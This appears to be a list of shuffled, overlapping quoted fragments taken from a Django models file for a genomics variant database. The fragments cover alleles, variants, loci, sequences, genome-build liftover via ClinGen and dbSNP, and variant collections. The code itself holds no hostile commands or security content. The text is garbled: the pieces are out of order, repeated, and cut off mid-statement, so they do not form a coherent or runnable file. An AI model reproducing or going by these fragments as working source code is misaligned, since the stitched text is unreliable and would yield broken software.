"sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids)",
"# destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id)",
"vas.first() if va: return va.variant raise ValueError(f'Could not find any variants in allele",
"genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str,",
"a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def",
"genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if",
"self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User,",
"@property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref,",
"related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns",
"was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource):",
"AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen",
"allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome",
"TextField from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q,",
"GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build)",
"vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav =",
"can have unique constraints) Postgres by default uses indexes for constraints, and large",
"share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in those",
"choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error class Meta: unique_together =",
"maximum size is 8191\" The easiest solution is to md5sum seq and make",
"@staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling",
"def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def",
"the different alleles at a locus Usually 2+ per line in a VCF",
"except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build:",
"want_chr) return chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class",
"g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise",
"None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\",",
"= r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\"",
"def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build: source = f\"from",
"to have 4 groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple = None",
"share MT and some unplaced scaffolds) - in those cases # we'll have",
"on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through",
"= models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self):",
"None: if self.error: # Retry if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE",
"and self.clingen_allele: can_merge = False merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen",
"FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import",
"have 4 groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple = None if",
"'.' @property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self)",
"merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into this allele \"\"\"",
"make the constraint on that. Another possible solution is to use Gist indexes",
"regex_pattern - has to have 4 groups, returns (chrom, position, ref, alt) \"\"\"",
"them on the Variant object - instead do 1-to-1 \"\"\" # Some builds",
"# Check if the other build shares existing contig genome_build_contigs = set(c.pk for",
"handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a",
"the build being used by ClinGen) - but it's not likely. It's a",
"in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\",",
"max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None):",
"desired genome build For others (NCBI Remap) we need to write the source",
"F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import",
"other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into this allele \"\"\" if self",
"is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is standard [GATCN] (ie not special",
"v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self)",
"= self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains no VariantAlleles at all!",
"f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all()",
"from django.db.models import Value as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING",
"VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref == alt or",
"variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string,",
"ref, alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt,",
"= AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass from this pass",
"def is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\"",
"by ClinGen) - but it's not likely. It's a bug to have the",
"flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel):",
"is generally done via ClinGen Allele Registry, but sometimes that can fail. Linked",
"Move across ClinGen Allele (may not have been possible to retrieve in all",
"alleles at a locus Usually 2+ per line in a VCF file (ref",
"va is None: raise ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\") dbsnp",
"query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\",",
"models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self)",
"to guarantee seq is unique (so Locus/Variant can have unique constraints) Postgres by",
"and then creating VariantAllele entries for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry)",
"VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually used as a cached result",
"= models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from the",
"the source genome build VCF first Alleles must have already been created -",
"models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build =",
"-> bool: \"\"\" Merge other_allele into this allele \"\"\" if self == other_allele:",
"Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool",
"a \"1:123321 G>C\" style string in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\",",
"\"\"\" # Some builds share contigs (eg GRCh37/38 share MT and some unplaced",
"in the desired genome build For others (NCBI Remap) we need to write",
"class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant =",
"return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\",",
"end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321",
"django.conf import settings from django.contrib.auth.models import User from django.db import models, IntegrityError from",
"bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) ->",
"\"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def",
"this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va",
"uses indexes for constraints, and large TextFields give error of: \"index row requires",
"variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas =",
"from library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from",
"variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin",
"entries for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the",
"1 Variant for a given locus/alt per database (handled via insertion queues) \"\"\"",
"clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref,",
"resolve to the same allele (due to our normalization not being the same",
"variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE)",
"{self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant =",
"return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self):",
"= genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version",
"f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does not check",
"database (handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True)",
"the VCF in the desired genome build For others (NCBI Remap) we need",
"position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple",
"def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry if",
"via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant",
"@property def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is standard [GATCN] (ie",
"contig errors all subclass from this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED:",
"Genome build independent - ie GRCh37 and GRCh38 variants for same change point",
"get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build)",
"from library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models import Wiki from",
"AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass from this pass if",
"-> bool: \"\"\" Variant alt sequence is standard [GATCN] (ie not special or",
"self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt):",
"bool: \"\"\" Merge other_allele into this allele \"\"\" if self == other_allele: raise",
"at the end of a liftover pipeline (once per build) \"\"\" pass class",
"= f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs =",
"Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called",
"locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def",
"= None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self,",
"@lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return",
"self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains no VariantAlleles at all! Cannot",
"source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to Allele.merge() \"\"\" old_allele =",
"complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name}",
"other_clingen_allele: # Move across ClinGen Allele (may not have been possible to retrieve",
"not find a variant in allele {self.id} for build {genome_build}') if not va:",
"a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\"",
"write the source genome build VCF first Alleles must have already been created",
"source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)",
"reference) \"\"\" # locus.ref should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self)",
"Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property def equivalent_variants(self)",
"alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern:",
"Provides a source of alleles for liftover pipelines. \"\"\" objects = InheritanceManager() def",
"Variant with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): #",
"return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\"",
"= other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True)",
"variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") ->",
"django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager from flags.models",
"(eg GRCh37/38 share MT and some unplaced scaffolds) - in those cases #",
"Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a",
"Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq !=",
"(\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\"",
"or 2 loci in a genome build being represented by 1 loci in",
"{gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus",
"same as ClinGen or 2 loci in a genome build being represented by",
"alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom,",
"was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return",
"get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\":",
"locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a",
"int = 20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def",
"conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele: try: g_hgvs =",
"kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return",
"class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name def",
"SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection",
"= Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref, alt class VariantWiki(Wiki):",
"handling indels. Contigs must match and variant.start <= end AND variant.end_position >= start",
"None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def start(self):",
"been created - allele_source used to retrieve them The VCF (in genome_build build)",
"'chrom pos ref alt') class Sequence(models.Model): \"\"\" We want to guarantee seq is",
"allele This is generally done via ClinGen Allele Registry, but sometimes that can",
"being the same as ClinGen or 2 loci in a genome build being",
"use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check",
"return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will",
"variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the",
"have the same variant linked through different VariantAlleles (so it can't be 1-to-1)",
"\"\"\" Only works if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele)",
"contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line",
"database (handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE)",
"self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and",
"normalization not being the same as ClinGen or 2 loci in a genome",
"alt alleles point to the same locus) There is only 1 Locus for",
"error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def",
"Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref, alt class VariantWiki(Wiki): variant",
"= models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) #",
"self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return",
"Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele",
"want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod",
"get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self,",
"return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build:",
"= models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\")",
"__format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele)",
"the same 3 variant/build/allele so we can add that unique_together constraint We only",
"self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def",
"None: raise ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant,",
"VCF first Alleles must have already been created - allele_source used to retrieve",
"been possible to retrieve in all builds, but at least one # links",
"unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if",
"-> Optional['Liftover']: \"\"\" Only works if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs",
"write VCF coordinates during liftover. Can be slow (API call) If you know",
"(handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref",
"insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence,",
"= self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool",
"va.variant) va.delete() return can_merge @property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True)))",
"have another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save()",
"conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return",
"class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def",
"for the row) There is only 1 Variant for a given locus/alt per",
"@staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover was done",
"have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: #",
"f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to Allele.merge()",
"\"\"\" Variants represent the different alleles at a locus Usually 2+ per line",
"models.JSONField(null=True) # Only set on error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\")",
"self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele",
"if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele",
"import settings from django.contrib.auth.models import User from django.db import models, IntegrityError from django.db.models",
"}, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to Allele.merge() \"\"\" old_allele",
"save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update,",
"we can add that unique_together constraint We only expect to store Alleles for",
"def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern)",
"self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q) return",
"and can't have another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele =",
"variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for",
"\"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class",
"needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry if server",
"the same as ClinGen or 2 loci in a genome build being represented",
"md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20):",
"across ClinGen Allele (may not have been possible to retrieve in all builds,",
"import reverse from django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers import",
"%s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def",
"-> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant",
"reverse from django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager",
"variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build)",
"va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\",",
"{self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()}",
"get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs",
"self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self)",
"get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']:",
":= self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param",
"for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple =",
"= ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom =",
"models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading",
"return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool:",
"and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True):",
"models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True)",
"line in a VCF file (ref + >= 1 alts pointing to the",
"\"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt)",
